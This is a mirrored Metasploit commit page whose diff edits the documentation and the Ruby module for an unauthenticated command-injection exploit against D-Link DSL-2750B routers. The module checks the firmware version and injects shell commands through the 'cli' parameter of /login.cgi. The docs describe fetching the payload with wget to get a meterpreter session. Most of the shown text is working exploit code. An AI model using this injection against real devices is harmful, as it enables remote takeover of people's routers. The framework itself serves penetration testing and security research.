infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixing documentation, improving exploits code

GSoC/Meterpreter_Web_Console
lucyoa 2018-05-20 12:55:46 -04:00
parent 8dd7a27f7b
commit 6ae55aadd4
No known key found for this signature in database
GPG Key ID: 4451D394D086AF54
2 changed files with 38 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
View File

@ -1,7 +1,9 @@
## Description
This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter. This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
Vulnerable firmwares are 1.01 up to 1.03. Vulnerable firmwares are 1.01 up to 1.03.
## Vulnerable Application ## Verification Steps
1. Start msfconsole 1. Start msfconsole
2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth` 2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
@ -11,7 +13,7 @@ Vulnerable firmwares are 1.01 up to 1.03.
6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session 6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
## Example ## Scenarios
``` ```
msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth

74
modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb
View File

@ -51,53 +51,47 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
begin res = send_request_cgi({
res = send_request_cgi({ 'method' => 'GET',
'method' => 'GET', 'uri' => '/ayefeaturesconvert.js'
'uri' => '/ayefeaturesconvert.js' })
})
unless res unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = $1
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" and version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed') vprint_error('Connection failed')
return CheckCode::Unknown return CheckCode::Unknown
end end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = $1
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" and version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed')
return CheckCode::Unknown
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
begin payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
payload = Rex::Text.uri_encode("multilingual show';#{cmd}'") res = send_request_cgi({
res = send_request_cgi({ 'method' => 'GET',
'method' => 'GET', 'uri' => '/login.cgi',
'uri' => '/login.cgi', 'vars_get' => {
'vars_get' => { 'cli' => "#{payload}$"
'cli' => "#{payload}$" },
}, 'encode_params' => false
'encode_params' => false }, 5)
}, 5) rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
end
end end
def exploit def exploit